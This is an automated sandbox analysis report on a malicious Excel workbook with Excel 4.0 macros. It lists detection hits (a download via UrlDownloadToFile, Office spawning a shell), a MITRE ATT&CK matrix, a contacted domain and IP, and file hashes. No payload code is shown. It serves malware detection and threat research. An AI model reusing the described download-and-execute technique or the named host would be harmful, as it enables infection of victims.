Analysis Report e1df57de_by_Libranalysis.xls
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Sigma detected: System File Execution Location Anomaly | Show sources |
Source: | Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: |
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | ReversingLabs: |
Source: | File opened: |
Source: | HTTPS traffic detected: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | JA3 fingerprint: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | OLE indicator, VBA macros: |
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | ReversingLabs: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting11 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | ReversingLabs |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
obsusa.net | 170.249.236.47 | true | false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
170.249.236.47 | obsusa.net | United States | 63410 | PRIVATESYSTEMSUS | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 403717 |
Start date: | 04.05.2021 |
Start time: | 10:56:42 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 55s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | e1df57de_by_Libranalysis.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 25 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.expl.evad.winXLS@3/7@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
170.249.236.47 | Get hash | malicious | Browse |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
PRIVATESYSTEMSUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134558 |
Entropy (8bit): | 5.368414756282515 |
Encrypted: | false |
SSDEEP: | 1536:YcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:fEQ9DQW+zPXO8 |
MD5: | 18E3B12893EEFEB2BE8E7BC323707DB2 |
SHA1: | 64C9969F961457DDF0D5179D26EAE99178EA5FA1 |
SHA-256: | 4401594B1B7495C244ABEED48A97A519262FBBE428F05333AFF0636AC2F6CB07 |
SHA-512: | 3339CFF863EB5A5AA7901D1D4A8C97A5953A3F8B7730A0EEEA784011B9934CFE45C983F02366329E9E1E3AB01620C2BA1408AC37F51518AC529768637F4C8D87 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 85151 |
Entropy (8bit): | 7.889280659792948 |
Encrypted: | false |
SSDEEP: | 1536:J3TzJxfg8ucuv4KrAeWviSkQ1WGHKlMVGoIahaDHTU6hryF70Ug:J3zgvcCbrAiSkQ1W2K2sTU2yF70Ug |
MD5: | C28C8BAC09C1AF3BE456ADA55E86C3F6 |
SHA1: | 6106316CB8338FF2AF6B25506DD221CF334AFC56 |
SHA-256: | 46018BCF9530F318F427C8538A84B0F0AF053704C56F0384C26A5D70DC62BC80 |
SHA-512: | 29F1C3D956055243ECFFF8A36F64CBE08F7E4807EDD013794819C3B81344EBF4806DBAE8AF2036188A75F30A4441688385A8B8AD5D7A614A3C7573F19DA715E6 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 909 |
Entropy (8bit): | 4.70367217896161 |
Encrypted: | false |
SSDEEP: | 12:8JGJRUt6CHiXOzDGXthDV+W+jA0/y1bDygLkeGLkeM4t2Y+xIBjKZm:8JcsurmA0KJDyS7aB6m |
MD5: | F5B4B42CFC3C63093DE56816959E9BB3 |
SHA1: | D19646FA6C9C0279206FB9A00A4DDA6CF12A46B3 |
SHA-256: | B8D74FCFCFA72ABC2E5228F860B2BCB44601C210064109F92330487FC65C4C12 |
SHA-512: | 482CCFBA108BEA255DB1B7B500AC580BD593727D8F01DE7E6AF84214207F95C342FAF592EED3990EB777BA1FB3FE3F194BA635C771564178F6B75001BAB502FC |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 2260 |
Entropy (8bit): | 4.736998091463738 |
Encrypted: | false |
SSDEEP: | 48:8tu7RuhOEXTKcNfOEAE2B6ptu7RuhOEXTKcNfOEAE2B6:8JFecNfFCKJFecNfFC |
MD5: | A4F1C92E2E88844149D9DDE7A878BF6A |
SHA1: | CB050263FC8E686DEF99FB7A7D32B5C00EFAC621 |
SHA-256: | 3B8EBE09578519F5CA0351A875916901D5350198029B791632139E9D5C6CC250 |
SHA-512: | ACFE7C52EEB81C95A6771C3F366BA711F8D439F207F058CEB89F1D9EF1869185BDDFA2A556EF6F62716A3BE20574CD1829FC26E75449D6D618AA1D8696314947 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 125 |
Entropy (8bit): | 4.7413886091115245 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM6YiHUwSLMp6lYUIYiHUwSLMp6lmM6YiHUwSLMp6lv:dj6hi0NRi0Nbhi0Nf |
MD5: | FA818B7E82A804136CCCDAEB0E371E4C |
SHA1: | 790C7E1C67EC725C24D5056180873455ACC57A4E |
SHA-256: | 6CAF0A49734FC7FE1DE034E925D1906442024E0C40C0BBA612217B0245B51B58 |
SHA-512: | 7D1ACC9D7F01044F50BD4926CB5DBB27A83459CB0EFE966A73F8C1803A7AB3FD2EA347C9ABAE584DAFE1EC152E918722C2F1BD4ACD4FFC2A296EDCEE6790DE00 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 168450 |
Entropy (8bit): | 6.809325376522765 |
Encrypted: | false |
SSDEEP: | 3072:fC8rmOAIyyzElBIL6lECbgBGzP5xLm7TE2nTUSyF70HijW26kHct6kHC4+C8rmOs:q8rmOAIyyzElBIL6lECbgB+P5Nm7TrU0 |
MD5: | 6C145938CE01E31F5B5D40E708709164 |
SHA1: | A244BCDF67106C5B7CCE73F98B51C0DBBCAEEA15 |
SHA-256: | F8E76ED1D5AEE18CB8F579FA006F10426D031005B357FDDC07C3C6212D83FE3D |
SHA-512: | 6601722CC3B0D06BCC54694A624408123A5351AA8082877297A561385190F8084B9B2BF630F0CCC5DE47BC5C6257732B4B9DFCF394E990A4086F3D2334F074DF |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.26064272206503 |
TrID: |
|
File name: | e1df57de_by_Libranalysis.xls |
File size: | 287232 |
MD5: | e1df57deebdfeab450bf91049acff902 |
SHA1: | 0037a523a17be3411b88072f7ceb3cc0ef384da7 |
SHA256: | b0cccc9e79029c5b0b4e835e22e783a37ded6a300ca9d1738e554b126dd0969c |
SHA512: | 3a2878bee800832e2eac6705d4b299b0814af28bf47dc0504a1425b87f9728f94a208222d3da907a35ce6c0cce0bce279cb765060e1fa464656bc83d4cfd9c87 |
SSDEEP: | 6144:YcPiTQAVW/89BQnmlcGvgZ7r3J8b5ICJK+T5gE:lDE |
File Content Preview: | ........................>......................./...........................*...+...,...-...................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74ecd4c6c3c6c4d8 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "e1df57de_by_Libranalysis.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-28 07:31:09 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.344544096356 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 1 . . . . . S h e e t 5 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 91 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 06 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.239529171145 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . t . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 275392 |
---|
General | |
---|---|
Stream Path: | Book |
